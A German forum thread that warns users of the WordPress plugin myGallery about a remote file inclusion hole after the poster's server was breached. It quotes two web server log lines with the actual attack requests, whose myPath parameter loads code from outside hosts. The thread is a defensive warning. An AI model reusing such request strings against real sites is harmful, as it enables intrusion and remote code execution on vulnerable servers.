Skats

Datenschutzerklärung Letzten 7 Tage (Beiträge) Stichworte Fussball Tippspiel Sakniff Impressum
Zurück   Skats > Technik & Digitales > Software
Registrieren Hilfe Benutzerliste Kalender


 
 
30. June 2007, 16:21   #1
Bandwurm
Erde, Wind & Feuer
 
Benutzerbild von Bandwurm
 
Registriert seit: February 2002
Ort: Ockershausen
Beiträge: 7.669
MyGallery - Wordpress Plugin, unbedingt updaten

Ich setze auf einer anderen Domain Wordpress ein und habe dort zum darstellen von Bildern das geniale Plugin myGallery dort ebenfalls im Einsatz.
Gestern nachmittag war es dann soweit, ein Blick ins Apache log zeigte mir, dass gerade seit fünf Minuten, sich da jemand auf den Server gehacked hatte.
Ein "locate" nach dieser Datei, die per wget runtergeladen wurde zeigte mir den Ort. Es war im myGallery Verzeichnis.
Ein kurzer Blick in das Apachelog dieser Domain zeigt die genaue Vorgehensweise und das Sicherheitsloch:

87.6.146.147 - - [29/Jun/2007:14:40:33 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.bgsuedpark.de/data/ xxxxxxxxxxxxxx? HTTP/1.1" 200 9957 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"


Ein anschließendes Durchsuchen des Changelogs der aktuellen myGallery Version brachte den Hinweis auf einen geschlossenen Sicherheitsbug:
Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability

Also schnell das Update eingespielt, die Datei gelöscht und schon war wieder Ruhe.


Ich kann also nur jeden raten, der dieses Plugin verwendet, auf die neuste Version zu updaten.

xxxxxxxxxx = abgeändert.
 
8. January 2008, 22:17   #2
Bandwurm
Erde, Wind & Feuer
 
Benutzerbild von Bandwurm
 
Registriert seit: February 2002
Ort: Ockershausen
Beiträge: 7.669
Ach wie süß ist das denn?

Leute hier läuft vBulletin, nicht Wordpress. skats.de kann also niemals diese Lücke haben, aber wenns schön macht.

Code:
08.01.2008 22:10:08 - 207.210.91.2 unlimited1.dnsprotect.com -  www.skats.de/software//mygallery/myfunctions/mygallerybrowser.php?myPath=http://zenteno.org/z/safe2.txt???
 
Antwort

  Skats > Technik & Digitales > Software

Stichworte
wordpress mygallery




Alle Zeitangaben in WEZ +1. Es ist jetzt 23:56 Uhr.


Powered by vBulletin, Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Online seit 23.1.2001 um 14:23 Uhr

Die hier aufgeführten Warenzeichen und Markennamen sind Eigentum des jeweiligen Herstellers.